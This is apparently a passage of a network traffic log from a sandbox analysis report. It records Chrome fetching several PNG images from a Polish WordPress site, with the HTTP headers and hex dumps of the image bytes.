                                                            Content-Type: image/png
                                                            2025-01-15 10:08:07 UTC7935INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 2c 00 00 00 e1 08 06 00 00 00 72 7c 88 ab 00 00 00 06 62 4b 47 44 00 ff 00 ff 00 ff a0 bd a7 93 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 07 74 49 4d 45 07 e1 02 1c 15 32 38 ae 5c 54 b4 00 00 20 00 49 44 41 54 78 da ec bd d9 af 64 c9 99 d8 f7 8b 88 b3 e6 c9 fd de bc 5b d5 bd b5 f6 56 64 77 93 d3 1c 89 23 c9 b6 04 c9 b0 6c c0 02 ec 17 03 86 01 3f 19 98 07 c3 7e b1 fc 68 48 fe 0f bc 01 06 fc 64 c0 f0 bb 01 c3 36 20 78 e0 11 46 33 1a ae 4d 76 57 75 75 ed 75 f7 25 f7 cc 93 67 8d 08 3f 64 35 c9 99 69 72 38 64 37 c9 ee 8e 1f 90 55 85 5a 6e 5d 44 66 fc ce f7 7d 11 f1 05 38 1c 0e 87 c3 e1 70 38 1c 0e 87 c3 e1 70 38 1c 0e 87 c3 e1 70 38 1c 0e 87 c3 e1 70 38 1c 0e 87 c3 e1 70 38
                                                            Data Ascii: PNGIHDR,r|bKGDpHYs.#.#x?vtIME28\T IDATxd[Vdw#l?~hHd6 xF3MvWuuu%g?d5ir8d7UZn]Df}8p8p8p8p8p8
                                                            2025-01-15 10:08:07 UTC8000INData Raw: 41 28 69 b6 20 49 04 e9 4a 91 e7 76 7d 06 d0 83 20 80 66 13 82 18 b4 14 14 f5 3a a5 fd 24 22 0b c3 f5 76 88 65 7e c9 68 fe 21 61 6b 4c 7f cb 12 44 35 9e 6f f1 8d 20 6a 08 bc b0 a0 b4 97 8c 57 1f e1 e9 82 cc 36 a8 6a 85 90 8a 46 b3 81 11 73 8a f9 15 17 cb 29 d1 65 84 d7 ea 71 74 78 cc d5 18 3a bb af 61 aa 9c ba 9e a2 08 90 22 c0 57 8a 4e 7b bd 54 59 d4 96 ac c8 31 a6 c0 88 12 cf ab 09 02 49 5d 1b 6c 29 a9 4a d0 25 3f d9 c3 16 7a 12 5f 0a ac 85 bc b0 64 59 bd de 06 12 7a 24 cd 88 38 89 b0 b9 a0 d2 86 d2 18 8c b4 f8 95 06 bf c4 a3 81 9e fb 4c 4e 2a 96 51 45 94 48 da bd 90 46 b3 83 90 1e 59 51 30 99 4c 01 e8 f5 7a 84 61 e8 26 80 13 d6 ef 26 9f 16 5d 59 6b 29 8a 12 63 2c 9e 17 a0 a4 47 55 4a 66 73 4d 31 57 5c 1e af f8 93 7f f9 1d ce af fe 35 fd cd 13 6e 5d bf
                                                            Data Ascii: A(i IJv} f:$"ve~h!akLD5o jW6jFs)eqtx:a"WN{TY1I]l)J%?z_dYz$8LN*QEHFYQ0Lza&&]Yk)c,GUJfsM1W\5n]
                                                            2025-01-15 10:08:07 UTC8000INData Raw: 38 11 71 b8 c1 fa 5a 83 d3 23 9b a3 83 29 d3 31 dc b8 21 59 ed d6 a9 d5 9c 65 de a0 db e5 f6 9d 36 8b 59 4c 91 b9 cb 00 51 67 4e 96 4d f8 e6 f1 88 4f ff e9 82 a7 df 96 f4 ba 77 e9 ad f6 88 82 39 79 31 a4 4c 72 c8 53 86 a3 4b 4e 4e cf 79 a7 ca 96 c7 28 21 48 73 4d 92 e6 e4 55 82 f1 46 08 ff 14 6d 4a 0a 6b 4e 69 f5 91 76 49 68 a5 84 ee 02 2f 92 48 5b 13 56 39 5a 19 30 15 96 1e 63 59 73 1c 1f fc 7a 45 a9 13 c6 b3 37 24 83 23 aa 6a 86 30 36 a1 bb 4b 7b ed 1a 8d 38 a2 a4 cf c1 eb 37 04 8d 00 cb 0b 90 76 c9 f9 c5 25 2f 9f 1f f0 f4 ab ef 48 27 37 69 06 ef 63 05 03 4a cb a6 d2 21 a5 dd 41 39 21 46 4d c9 39 a6 10 03 7a d7 ee f2 f1 5f 5e 23 0c 25 8f be 7e ce 70 70 40 a5 3d 6c d3 02 e3 23 85 c4 b6 34 8e bb f4 c9 77 3c 41 14 7b f8 81 43 5e 80 b4 5d e2 da 32 0f d1 e8
                                                            Data Ascii: 8qZ#)1!Ye6YLQgNMOw9y1LrSKNNy(!HsMUFmJkNivIh/H[V9Z0cYszE7$#j06K{87v%/H'7icJ!A9!FM9z_^#%~pp@=l#4w<A{C^]2
                                                            2025-01-15 10:08:07 UTC7953INData Raw: f1 64 4e 9e 5d 20 ad 39 2f bf 1b 73 72 30 a7 98 46 5c 94 2e ae 15 82 ea 12 ba 6b 58 c4 a4 69 49 e4 58 b4 82 1a a1 e8 e2 1a a8 84 41 38 05 b9 2a 51 5a 22 95 4d 91 29 8a 40 52 56 cb 28 2c 83 7c fb c0 f4 32 6c 54 6b b4 aa 50 55 46 55 2e 80 0c ad 2c 04 06 8d 41 2b 45 a5 2a 1c cb c5 b6 62 16 e3 80 97 4f 2a d2 c5 f0 ad 1b c3 9c 83 67 86 d0 d9 a1 19 de 66 72 1e 70 f8 da 70 36 b0 58 cc eb 38 6a 85 48 76 d1 95 8b 14 1e ab 2b 2d 9a 35 45 62 34 95 69 61 e4 0a 96 a7 70 5d 89 e3 6b 34 36 77 ee 7e c0 fb ef 7d 4c a3 e1 d2 bf 18 71 72 9a 90 a5 7d 2c e9 50 96 11 97 97 86 d1 58 b2 be 71 8d 5b b7 6e e1 38 1e 27 27 67 9c 9c 9c 72 ff fe 7d e2 38 be ea 8b 2b c0 fa 73 26 da f9 ff bd 5c e3 79 1e ef bf ff 3e ef bd f7 1e 49 92 f0 e4 bb ef 78 f2 f8 31 bf fd e4 37 64 d9 9c 9f fc e5
                                                            Data Ascii: dN] 9/sr0F\.kXiIXA8*QZ"M)@RV(,|2lTkPUFU.,A+E*bO*gfrpp6X8jHv+-5Eb4iap]k46w~}Lqr},PXq[n8''gr}8+s&\y>Ix17d


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            118192.168.2.1649178178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:06 UTC413OUTGET /wp-content/uploads/2015/07/disney_descendans.png HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:07 UTC257INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:06 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:40:11 GMT
                                                            ETag: "3ee5-620a8b44c9d01"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 16101
                                                            Content-Type: image/png
                                                            2025-01-15 10:08:07 UTC7935INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 2c 00 00 00 e1 08 06 00 00 00 72 7c 88 ab 00 00 00 06 62 4b 47 44 00 00 00 00 00 00 f9 43 bb 7f 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 07 74 49 4d 45 07 e1 02 1c 15 2e 35 36 9a 75 54 00 00 20 00 49 44 41 54 78 da ec 9d 77 7c 1d c5 b9 b0 9f d9 dd d3 8b ba 64 49 56 b1 2c cb 55 b6 c1 0d db d8 f4 62 4a 68 81 74 08 24 5f 48 42 ee 4d 81 90 10 52 20 81 10 6e 42 12 b8 e4 52 12 08 c4 81 84 16 7a 31 60 3a ee bd 77 75 c9 ea d2 39 3a 7d 77 e7 fb 43 47 c6 36 ee 36 c6 c0 3c bf 9f 30 3a 3a db 66 77 9e 7d e7 dd 99 59 50 28 14 0a 85 42 a1 50 28 14 0a 85 42 a1 50 28 14 0a 85 42 a1 50 28 14 0a 85 42 a1 50 28 14 0a 85 42 a1 50 28 14 0a 85 42 a1 50 28 14 0a 85 42 a1 50 28 14 0a 85 42 a1
                                                            Data Ascii: PNGIHDR,r|bKGDCpHYs.#.#x?vtIME.56uT IDATxw|dIV,UbJht$_HBMR nBRz1`:wu9:}wCG66<0::fw}YP(BP(BP(BP(BP(BP(BP(BP(B
                                                            2025-01-15 10:08:07 UTC8000INData Raw: 5e 84 74 9a bc f9 ec 62 d6 2e 5b 4b 34 04 ae 22 b8 f0 7b 53 d8 ba b8 97 79 ff d9 80 d7 04 a7 13 c2 06 0c 99 56 c8 f7 6e bc 82 cd 76 11 ef dc ff 1a 79 7e 2f 85 01 d8 b6 74 21 e3 ce bb 04 e7 20 88 49 03 a9 9b 98 89 08 7e 77 9c b9 4f 3e 48 41 de 26 ba 13 06 19 81 0b 09 e6 57 52 30 6c 2c d7 ff e1 5e 1e be f3 16 6e bf e3 25 4e 5f b2 89 59 9f 9f 8a 9f ad 2c 7c fb 7e 4e 3e f3 cb f4 75 b6 d2 d9 dc 41 a8 a7 1c 21 3c 68 86 17 87 33 c0 55 df fd 31 c9 be 4e 9c 5e 37 68 ce fe c0 5c 0a b0 35 62 89 24 a9 78 84 0c cd c1 1b ff be 9f dc dc 09 74 44 34 72 73 b2 f0 65 95 f4 3f 6f 14 92 ea 69 53 09 64 16 f0 fa 93 f3 b8 e3 d6 b7 38 75 d9 46 be fa ed 73 48 f9 52 d4 d5 3e 4d 7e 6e 1f 48 ab 3f b2 1a 78 86 28 25 f1 44 9c 78 32 49 32 12 67 fc f4 33 18 3f fd 9c 74 74 12 27 23 3f 13
                                                            Data Ascii: ^tb.[K4"{SyVnvy~/t! I~wO>HA&WR0l,^n%N_Y,|~N>uA!<h3U1N^7h\5b$xtD4rse?oiSd8uFsHR>M~nH?x(%Dx2I2g3?tt'#?
                                                            2025-01-15 10:08:07 UTC166INData Raw: 77 dc 71 16 cf 8b 29 02 a3 07 17 ce 76 bd 90 75 34 ee a3 d2 34 60 42 2c ed de 02 b7 4c f7 1b 57 02 26 f0 41 a6 3b 0e 8b 90 10 08 09 11 2c 42 c2 81 63 75 3b c0 cc 70 cb 47 2a 6a 3a c7 19 cd 83 aa f2 bb f2 1c ed c2 9c 99 c3 14 29 4a 78 e6 98 d5 18 17 20 24 9c 16 16 46 d6 2b a4 7e 99 de 48 a7 67 29 96 c8 e9 b4 c4 6a 1d 93 b3 bd 34 6e ab e5 fc c1 23 89 a5 4e 82 eb a8 5d 7d 35 cf a5 b7 66 d7 1b d7 d6 78 36 85 9d 70 10 00 00 00 00 fe 8e 6f 28 45 90 26 a5 b4 66 18 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                            Data Ascii: wq)vu44`B,LW&A;,Bcu;pG*j:)Jx $F+~Hg)j4n#N]}5fx6po(E&fIENDB`


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            119192.168.2.1649180178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:06 UTC408OUTGET /wp-content/uploads/2015/07/disney_fairs.png HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:07 UTC257INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:07 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:40:10 GMT
                                                            ETag: "87b5-620a8b438b75c"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 34741
                                                            Content-Type: image/png
                                                            2025-01-15 10:08:07 UTC7935INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 2c 00 00 00 e1 08 06 00 00 00 72 7c 88 ab 00 00 00 06 62 4b 47 44 00 ff 00 ff 00 ff a0 bd a7 93 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 07 74 49 4d 45 07 e1 02 1c 15 33 39 c0 40 55 63 00 00 20 00 49 44 41 54 78 da ec bd f7 8f 64 59 76 e7 f7 b9 cf 86 b7 e9 b3 bc eb ea 6a 6f 67 7a 86 33 3d 74 bb e4 90 4b 72 46 22 64 40 2d 81 15 04 11 a2 b0 02 b4 5a fd 28 ec ea 3f 90 59 80 10 81 05 24 ed 72 05 99 25 a8 a5 15 39 ae a7 67 da 4c 57 75 99 ae ca f2 95 de 44 66 f8 88 e7 ef bd fa 21 b2 ab ab 7b da bb e9 9e be 9f 44 54 a5 89 cc 77 e3 bc b8 df 77 ce 79 e7 9e 0b 06 83 c1 60 30 18 0c 06 83 c1 60 30 18 0c 06 83 c1 60 30 18 0c 06 83 c1 60 30 18 0c 06 83 c1 60 30 18 0c 06 83 c1 60 30
                                                            Data Ascii: PNGIHDR,r|bKGDpHYs.#.#x?vtIME39@Uc IDATxdYvjogz3=tKrF"d@-Z(?Y$r%9gLWuDf!{DTwwy`0`0`0`0`0`0
                                                            2025-01-15 10:08:07 UTC8000INData Raw: 0b 3c 74 fc 01 2a 8d 2a ab eb 6b 7c 6f f8 7d f6 56 f7 90 bd 84 aa 53 a6 ec 95 90 b1 64 65 65 85 ed bd 1d aa d3 35 96 ee 5c 23 72 12 44 de a2 5a 6a e0 7a 1e 61 1a 10 0c c6 08 a9 d1 6e 86 93 4e 5e 5b 4e 5a 28 29 81 18 df 29 80 e7 90 c4 92 2c ce 50 49 4a c6 90 d0 ce 18 76 03 d2 44 e1 b8 3e 56 b9 0c 96 83 76 34 4a 41 16 db 48 37 4f 46 9e cd 9e e6 c6 76 c2 a9 a9 0a 75 4f a2 b2 21 b6 06 61 29 a6 a7 6a 54 fa 11 af dd be 49 a0 7d 66 0e 1f 26 99 b2 69 88 26 45 7c 7c 04 e2 4d 17 95 8f 47 ac de f4 3d d3 22 d9 08 d6 a7 c9 30 1a b2 b2 b6 cc f2 fa 0a 61 16 90 ea 64 b2 f8 bf 00 f9 99 1c 73 87 e6 a8 54 2a fb 69 f5 89 5c 59 fb 6f dd 8c 8c bd b0 c5 6e d0 22 b2 c6 6c b5 d7 b8 7a f3 32 a3 d1 88 c7 1e 7a 8a d3 f3 0f 33 c5 02 2e f9 fd 69 73 6f 3d 7d 4a c8 98 3d 5a 5c 09 af 70
                                                            Data Ascii: <t**k|o}VSdee5\#rDZjzanN^[NZ()),PIJvD>Vv4JAH7OFvuO!a)jTI}f&i&E||MG="0adsT*i\Yon"lz2z3.iso=}J=Z\p
                                                            2025-01-15 10:08:07 UTC8000INData Raw: 56 af 6f 70 b8 d2 63 63 63 13 2b 2d 8d c9 06 c5 4e 4e d6 cb c8 ad a6 c8 0a 4c 2f 47 8c 34 8e b6 d4 3c 9f 28 88 a9 45 0b 84 cd 1a 35 55 a3 e9 b7 98 88 c7 99 19 9f 65 7a 72 86 c9 e6 04 31 35 24 b0 b3 b7 cd ee f2 3e a3 2c 61 90 0d 39 4c 0e d9 3d d8 61 6b 7b 93 b5 ad 35 76 0e 76 19 e9 94 41 32 a4 db 1f 50 16 06 8c 20 cf 2a a2 9e 4c 83 b6 55 c7 e9 78 d4 83 98 07 8f 1e 54 66 7c d6 e1 b5 57 3e c7 85 b9 f3 9c 99 3b 45 2b ac 93 26 1a 43 86 1b 87 e8 b2 a0 48 33 d0 47 1d 95 00 ab 0c d4 05 7e a7 49 10 04 38 9e 87 13 f8 38 51 40 d4 8a 08 ea 01 ba c8 18 1d 1e 92 0e 12 ac ae f8 a1 d1 de 01 e9 d6 1e 74 35 24 bf c2 37 89 8a 93 d2 1e ec 8d 0a 6e 9a 75 f2 42 93 a7 19 1b 1b 07 6c ef 17 80 a0 cc 4a 8a a1 a6 c8 73 d2 61 4a 56 14 38 c2 43 48 41 29 04 b2 11 e3 c5 31 5a 17 e8 22
                                                            Data Ascii: Vopccc+-NNL/G4<(E5Uezr15$>,a9L=ak{5vvA2P *LUxTf|W>;E+&CH3G~I88Q@t5$7nuBlJsaJV8CHA)1Z"
                                                            2025-01-15 10:08:07 UTC8000INData Raw: 77 3c 5e bc f8 22 93 de 14 0b b3 f3 4c 34 c6 70 80 3c 4b f1 a5 c3 f8 94 8b 15 39 79 9e 11 d5 7d c2 9a 8b e3 09 64 21 70 3d c5 54 73 86 85 f1 33 34 bc 31 1c 82 c7 29 dc c7 75 0c 58 9f 0c 46 09 aa bd 1c f1 eb 80 55 09 1b 2a 4d 95 4b 48 d3 99 60 92 59 76 92 3b 1c 16 0a eb 29 84 23 b1 c2 22 94 05 5b 92 e7 ba ea 62 b4 06 72 ca 72 44 6f bb cb 70 d3 d2 48 a7 f1 ac 78 ec 59 59 95 c1 18 4d a9 33 74 91 90 bb 2e d6 73 70 9a 11 91 17 53 6a cb b0 b7 c2 99 99 69 ae 9c bb 4a e4 d6 91 a5 e1 c9 0b 4f 60 85 a5 2f 12 82 5c 20 47 e5 d1 73 42 db 6b 33 de 99 a0 59 6b 61 13 c3 70 b7 4f 31 c8 b1 05 08 23 8f 6e 36 89 10 12 29 1d 5c 15 90 db 82 3c 33 28 c7 23 aa c5 78 9e 77 94 10 0d 3f ff f0 17 fc cb ff e3 7f 65 cf 19 d2 b9 b4 c0 3b 2b 37 98 9c 9e e1 4c 6b 9e b3 27 17 f9 82 f8 22
                                                            Data Ascii: w<^"L4p<K9y}d!p=Ts341)uXFU*MKH`Yv;)#"[brrDopHxYYM3t.spSjiJO`/\ GsBk3YkapO1#n6)\<3(#xw?e;+7Lk'"
                                                            2025-01-15 10:08:07 UTC2806INData Raw: 1c 3b 61 ee 8e 93 b5 13 1e 3f ae f6 3e ae fc c4 5d 9f bc 3b 10 fe f9 4b ce 74 ce 91 e7 39 69 9a 72 e9 d2 25 b2 2c 3b 1f 45 d1 b2 10 22 2f 46 58 01 ac 87 7f b2 b4 5e 3f 71 e2 c4 9f be fd f6 db 67 db ed b6 6a 36 9b f7 70 c3 3e 1b 58 7d fc 18 c4 03 ef 4e ec e8 ec 3c 16 18 f9 98 d7 fb 59 aa ab 7d d5 f7 77 0e 6b 2d db db db 5c b9 72 c5 3c f7 dc 73 ff 45 6b bd 5e 8c ac bd 5b d1 d6 63 7f 50 e8 b6 db ed 4b fd 7e ff bd ab 57 af 92 24 09 c6 98 22 f9 af b0 3d c1 ca 8c b3 fa af 5e bd 4a bf df 7f af dd 6e 5f 12 42 74 8b b3 53 00 eb 51 01 2b 8b a2 68 f1 ec d9 b3 7f b2 b4 b4 94 6f 6e 6e 92 65 19 d6 da 02 5a 85 ed aa ac b2 2c 63 73 73 93 6b d7 ae e5 67 cf 9e fd 93 28 8a 16 85 10 45 0e 56 01 ac 47 78 c2 a4 dc 98 9f 9f 3f 97 e7 f9 6b 97 2f 5f 66 30 18 90 e7 79 01 ac c2 76
                                                            Data Ascii: ;a?>];Kt9ir%,;E"/FX^?qgj6p>X}N<Y}wk-\r<sEk^[cPK~W$"=^Jn_BtSQ+honneZ,csskg(EVGx?k/_f0yv


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            120192.168.2.1649181178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:06 UTC407OUTGET /wp-content/uploads/2015/07/disney_cars.png HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:07 UTC257INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:07 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:40:24 GMT
                                                            ETag: "6616-620a8b50c61b9"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 26134
                                                            Content-Type: image/png
                                                            2025-01-15 10:08:07 UTC7935INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 2c 00 00 00 e1 08 06 00 00 00 72 7c 88 ab 00 00 00 06 62 4b 47 44 00 ff 00 ff 00 ff a0 bd a7 93 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 07 74 49 4d 45 07 e1 02 1c 15 3a 02 a0 89 07 0e 00 00 20 00 49 44 41 54 78 da ec bd 79 94 5c f5 75 ef fb f9 fd ce 54 73 f5 dc d5 73 b7 5a 52 4b 42 b3 04 42 20 b0 8d c1 80 c1 36 1e e2 18 df d8 89 ed 75 b3 e2 f5 f2 e2 f7 f2 1c 67 f9 26 b9 b9 c9 ba 4e 56 56 de b5 6f 86 e7 eb 24 be 36 9e c0 80 31 b6 09 02 64 06 23 24 24 81 0c 12 42 63 6b ec 56 0f ea b1 ba e6 aa 73 ce ef f7 fe a8 ea 46 92 01 63 26 83 73 3e 5a b5 a4 6e 9d ae 3a bd eb fc be b5 f7 fe ed bd 0f 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04
                                                            Data Ascii: PNGIHDR,r|bKGDpHYs.#.#x?vtIME: IDATxy\uTssZRKBB 6ug&NVVo$61d#$$BckVsFc&s>Zn:
                                                            2025-01-15 10:08:07 UTC8000INData Raw: 34 46 1c b4 e5 10 73 34 61 e1 e1 ab 0a b1 e6 7a a4 94 98 18 c8 72 91 d3 fb 9f 61 66 74 84 cd eb d7 b3 24 d5 8a 08 07 42 15 08 d6 5b 4d ae ce 73 ef 25 02 3c 8f bb bf 7d 1b 07 0e 3e cf 8d 1f 78 3f 1d 89 18 66 28 c2 fa b5 eb 78 e4 b1 c7 68 94 9a f6 96 16 c2 96 c5 d4 d9 71 c6 4f 9e e1 f0 ec 0c 7e 31 8f f0 35 42 43 c9 ad 30 93 c9 91 c9 65 99 1a 1b 43 2b 4d 34 16 a3 e2 bb 9c 9b 9c 64 36 9d a6 58 2a e3 96 2b 78 b5 7c 55 b9 54 5a 38 15 79 51 18 62 00 76 ed cd b6 a8 e6 58 ec da bf e7 77 16 25 10 43 a0 d0 d8 e7 7d cf a8 fd 6d 9d f7 f5 f9 3d 8f 02 10 f9 7c f5 71 de 31 e7 cf 8f 12 80 ae 09 a0 c2 ad e6 75 32 d9 0b fe 7f fe 35 ce 5f cf f3 25 10 f3 e5 13 b9 da b1 7e 2d f4 9e 7f 54 78 61 a7 54 03 e5 da 43 01 a6 6d 62 87 23 08 43 22 a5 81 15 0e 11 8a 44 b0 43 d5 7c 9c 63
                                                            Data Ascii: 4Fs4azraft$B[Ms%<}>x?f(xhqO~15BC0eC+M4d6X*+x|UTZ8yQbvXw%C}m=|q1u25_%~-TxaTCmb#C"DC|c
                                                            2025-01-15 10:08:07 UTC8000INData Raw: 59 55 23 ef 80 e5 05 a1 a9 a8 9e fa 67 f9 5d 48 25 92 78 02 61 34 c3 8f 2f 18 c5 1b 8c a1 85 12 f8 13 29 da d6 ac 22 d9 95 64 6a 66 94 bf f9 cf ff 0f 13 93 93 44 63 71 ca d5 1a 43 d7 ae a1 28 0a 5b 36 6f a2 a9 29 8e 2e 0b 46 25 b0 be 92 83 ad 6a f4 af ed e7 b1 c7 1e c3 71 e1 cc 99 b3 4c cf 67 f8 f9 93 cf 90 ab b8 ec d8 b5 93 78 53 0c 5f 7b 27 fd 7d dd ac aa 56 f0 1a 7e e6 e7 16 18 b9 32 4c 76 66 9e c9 b1 eb cc 4e 4f 32 37 bf c0 fc 62 96 5c 3e 87 5b c8 e3 59 9c 23 ea 56 eb e1 17 10 03 02 8a 82 57 55 eb cb d6 df f8 71 eb eb 0e 1a aa 82 b0 ec 4f 75 e1 74 d1 15 15 55 34 d6 57 74 eb c5 a5 0e f5 6e 06 ae cb ef 9d 94 68 00 cc ad d7 d4 db 02 6c f1 49 bf 17 5c 1c 1c ea 2d 68 dc c6 8f e2 d4 17 89 fd 74 d7 50 cb ad bb 39 cd b4 50 85 da d8 8e ba 6c d7 c1 72 eb 61 ab
                                                            Data Ascii: YU#g]H%xa4/)"djfDcqC([6o).F%jqLgxS_{'}V~2LvfNO27b\>[Y#VWUqOutU4WtnhlI\-htP9Plra
                                                            2025-01-15 10:08:07 UTC2199INData Raw: 00 8f c7 83 a6 69 28 8a 22 db 04 7f 85 41 75 23 04 ac d5 6a 14 8b 45 46 46 46 b8 78 f1 a2 ed 38 ce 2f 1f 7f fc f1 a7 9a 9b 9b 8f 29 8a 32 2b 84 b0 e5 88 49 60 fd d1 a1 e5 ba 6e 2c 93 c9 6c 7d eb ad b7 0e 8f 8c 8c fc fb fe fe fe 50 77 77 37 b1 58 0c bf df 8f ae eb a8 aa 8a aa aa 12 5c 5f 31 47 f5 e9 10 30 93 c9 30 3c 3c cc c5 8b 17 f3 5d 5d 5d 3f de b7 6f df 6f 63 b1 d8 29 21 44 46 c2 4a 02 eb 41 3a 78 05 10 2a 16 8b eb ce 9e 3d fb c8 9b 6f be f9 af 13 89 c4 fa ee ee 6e b5 ab ab 8b 50 28 84 cf e7 43 d3 b4 4f 1c d7 a7 5d 97 84 d8 83 0f a7 4f bb a9 1b 8e ca b2 2c 2a 95 0a f9 7c 9e 91 91 11 86 87 87 ed b9 b9 b9 8f f6 ef df ff f3 81 81 81 a3 81 40 e0 63 20 2f 84 90 b9 01 09 ac 07 f2 c0 f6 99 a6 d9 39 31 31 b1 ed 83 0f 3e d8 73 e5 ca 95 ef a7 d3 e9 74 2a 95 52
                                                            Data Ascii: i("Au#jEFFFx8/)2+I`n,l}Pww7X\_1G00<<]]]?ooc)!DFJA:x*=onP(CO]O,*|@c /911>st*R


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            121192.168.2.1649182178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:07 UTC657OUTGET /wp-content/uploads/2015/07/carefour_glowna_thumb.png HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: image
                                                            Referer: https://canpol.poznan.pl/en/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:07 UTC257INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:07 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:40:09 GMT
                                                            ETag: "4a9d-620a8b429f231"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 19101
                                                            Content-Type: image/png
                                                            2025-01-15 10:08:07 UTC7935INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 2c 00 00 00 e1 08 06 00 00 01 05 7b b8 3d 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 20 00 49 44 41 54 78 9c ed 9d 05 78 53 57 1b c7 ff 6d 92 4a aa d4 a0 b4 b4 c5 8a bb c3 80 e1 ba e1 2e c3 06 c3 6d ce 98 b0 8f c1 86 cb 36 18 b0 01 63 c0 60 50 86 8c e1 1b 0c 77 29 52 28 d0 02 05 6a 50 6f 93 b4 fd ce b9 69 42 d2 46 6e ac 49 ca f9 3d cf 7d 72 e5 dc 73 df 9c fb de f7 f8 7b 84 f9 f9 f9 b0 45 84 d6 16 40 1b 4c 30 43 29 19 82 3d 7c f8 30 3f 2c 2c cc 94 e7 39 f0 0d 68 88 60 a6 0a c5 c5 01 9e c2 15 fb ab 3c 77 ee dc c5 c6 8d 1b 37 d0 17 ce 6c 82 39 bc b9 40 b9 9f ff cf 07 68 37 e3 77 1c 59 3c a0 48 b8 b4 b4 b4 fa 7c e2 33 49 b0 d4 36 0d e1 79 ec 02 ce dc 7c aa 26 14 e5 c1 d3 14 54
